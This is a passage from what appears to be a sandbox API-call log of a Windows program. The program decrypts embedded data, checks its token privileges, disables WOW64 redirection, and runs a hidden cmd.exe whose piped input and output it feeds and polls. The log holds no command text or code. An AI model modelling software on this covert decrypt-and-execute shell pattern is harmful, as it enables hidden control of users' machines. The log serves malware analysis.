(hModule=0x76d30000, lpProcName="GetFinalPathNameByHandleW") returned 0x76d60a25 [0062.767] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x76d30000 [0062.767] GetProcAddress (hModule=0x76d30000, lpProcName="QueryFullProcessImageNameW") returned 0x76d515f7 [0062.767] GetProcessHeap () returned 0x520000 [0062.767] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0062.767] GetProcessHeap () returned 0x520000 [0062.767] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0062.767] GetProcessHeap () returned 0x520000 [0062.768] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b78 | out: hHeap=0x520000) returned 1 [0062.768] GetProcessHeap () returned 0x520000 [0062.768] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c378 | out: hHeap=0x520000) returned 1 [0062.768] GetProcessHeap () returned 0x520000 [0062.768] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b90 | out: hHeap=0x520000) returned 1 [0062.768] GetProcessHeap () returned 0x520000 [0062.768] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544ba8 | out: hHeap=0x520000) returned 1 [0062.768] GetProcessHeap () returned 0x520000 [0062.768] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c3a0 | out: hHeap=0x520000) returned 1 [0062.768] GetProcessHeap () returned 0x520000 [0062.768] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c3c8 | out: hHeap=0x520000) returned 1 [0062.768] GetProcessHeap () returned 0x520000 [0062.768] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c350 | out: hHeap=0x520000) returned 1 [0062.768] GetProcessHeap () returned 0x520000 [0062.768] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1000) returned 0x544f48 [0062.768] NtQueryObject (in: Handle=0x0, ObjectInformationClass=0x3, ObjectInformation=0x544f48, ObjectInformationLength=0x1000, ReturnLength=0x71ff04 | out: ObjectInformation=0x544f48, ReturnLength=0x71ff04) returned 0xc0000004 [0062.768] GetProcessHeap () returned 0x520000 [0062.768] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544f48 | out: hHeap=0x520000) returned 1 [0062.768] GetProcessHeap () returned 0x520000 [0062.768] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2000) returned 0x544f48 [0062.769] NtQueryObject (in: Handle=0x0, ObjectInformationClass=0x3, ObjectInformation=0x544f48, ObjectInformationLength=0x2000, ReturnLength=0x71ff04 | out: ObjectInformation=0x544f48, ReturnLength=0x71ff04) returned 0x0 [0062.769] RtlGetVersion (in: lpVersionInformation=0x71fdf0 | out: lpVersionInformation=0x71fdf0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0062.769] GetProcessHeap () returned 0x520000 [0062.769] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544f48 | out: hHeap=0x520000) returned 1 [0062.769] GetVersion () returned 0x1db10106 [0062.769] GetCurrentProcess () returned 0xffffffff [0062.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x71ff28 | out: TokenHandle=0x71ff28*=0x11c) returned 1 [0062.769] GetTokenInformation (in: TokenHandle=0x11c, TokenInformationClass=0x18, TokenInformation=0x71ff2c, TokenInformationLength=0x4, ReturnLength=0x71ff30 | out: TokenInformation=0x71ff2c, ReturnLength=0x71ff30) returned 1 [0062.769] CloseHandle (hObject=0x11c) returned 1 [0062.769] Wow64DisableWow64FsRedirection (in: OldValue=0x71ff28 | out: OldValue=0x71ff28*=0x0) returned 1 [0062.769] GetProcessHeap () returned 0x520000 [0062.769] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x60) returned 0x544aa0 [0062.769] CryptImportKey (in: hProv=0x534c10, pbData=0x71fec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x544b08) returned 1 [0062.769] CryptDecrypt (in: hKey=0x544b08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0, pdwDataLen=0x71ff2c | out: pbData=0x544aa0, pdwDataLen=0x71ff2c) returned 1 [0062.769] CryptDestroyKey (hKey=0x544b08) returned 1 [0062.769] GetProcessHeap () returned 0x520000 [0062.769] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x53c350 [0062.769] CryptImportKey (in: hProv=0x534c10, pbData=0x71f818, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x544b08) returned 1 [0062.769] CryptDecrypt (in: hKey=0x544b08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53c350, pdwDataLen=0x71f8c4 | out: pbData=0x53c350, pdwDataLen=0x71f8c4) returned 1 [0062.770] CryptDestroyKey (hKey=0x544b08) returned 1 [0062.770] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x71f910, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.770] CreatePipe (in: hReadPipe=0x71f890, hWritePipe=0x71f888, lpPipeAttributes=0x71f8b8, nSize=0x0 | out: hReadPipe=0x71f890*=0x120, hWritePipe=0x71f888*=0x124) returned 1 [0062.770] CreatePipe (in: hReadPipe=0x71f884, hWritePipe=0x71f894, lpPipeAttributes=0x71f8b8, nSize=0x0 | out: hReadPipe=0x71f884*=0x128, hWritePipe=0x71f894*=0x12c) returned 1 [0062.770] SetHandleInformation (hObject=0x124, dwMask=0x1, dwFlags=0x0) returned 1 [0062.770] SetHandleInformation (hObject=0x128, dwMask=0x1, dwFlags=0x0) returned 1 [0062.771] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x71f8c8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x120, hStdOutput=0x12c, hStdError=0x12c), lpProcessInformation=0x71f8a4 | out: lpCommandLine=0x0, lpProcessInformation=0x71f8a4*(hProcess=0x134, hThread=0x130, dwProcessId=0x5dc, dwThreadId=0x248)) returned 1 [0062.837] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x71f8b4, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x71f8b4*=0x5f, lpOverlapped=0x0) returned 1 [0062.837] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0063.842] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0063.843] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0063.874] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0063.874] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0063.906] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0063.906] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0063.936] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0063.936] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0066.489] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0066.489] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0066.512] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0066.512] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0066.542] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0066.542] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0066.573] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0066.573] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0067.242] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.242] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0067.299] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.299] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0067.322] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.322] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0067.353] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x8f, lpBytesLeftThisMessage=0x0) returned 1 [0067.353] ReadFile (in: hFile=0x128, lpBuffer=0x71fb18, nNumberOfBytesToRead=0x8f, lpNumberOfBytesRead=0x71f89c, lpOverlapped=0x0 | out: lpBuffer=0x71fb18*, lpNumberOfBytesRead=0x71f89c*=0x8f, lpOverlapped=0x0) returned 1 [0067.353] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0067.384] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x24, lpBytesLeftThisMessage=0x0) returned 1 [0067.384] ReadFile (in: hFile=0x128, lpBuffer=0x71fb18, nNumberOfBytesToRead=0x24, lpNumberOfBytesRead=0x71f89c, lpOverlapped=0x0 | out: lpBuffer=0x71fb18*, lpNumberOfBytesRead=0x71f89c*=0x24, lpOverlapped=0x0) returned 1 [0067.384] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0067.753] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.753] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0067.774] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.774] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0069.387] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.387] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0069.412] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.413] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0069.444] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.444] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0069.507] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x77, lpBytesLeftThisMessage=0x0) returned 1 [0069.508] ReadFile (in: hFile=0x128, lpBuffer=0x71fb18, nNumberOfBytesToRead=0x77, lpNumberOfBytesRead=0x71f89c, lpOverlapped=0x0 | out: lpBuffer=0x71fb18*, lpNumberOfBytesRead=0x71f89c*=0x77, lpOverlapped=0x0) returned 1 [0069.508] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0069.548] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.548] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0069.847] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.847] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0069.864] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.865] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0069.898] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.899] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0069.930] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.930] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0069.975] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.976] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.005] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.005] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.036] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.037] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.067] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.067] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.100] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.101] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.129] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.130] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.161] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.161] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.193] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.193] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.223] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.223] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.254] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.254] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.286] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.286] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.317] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.317] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.348] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.349] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0070.395] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.395] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0071.930] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0071.930] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.254] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.254] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.282] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.282] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.314] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.314] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.345] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.345] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.376] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.376] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.407] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.407] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.438] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.438] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.471] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.471] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.501] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.501] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.532] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.532] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.563] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0072.563] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0072.618] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, 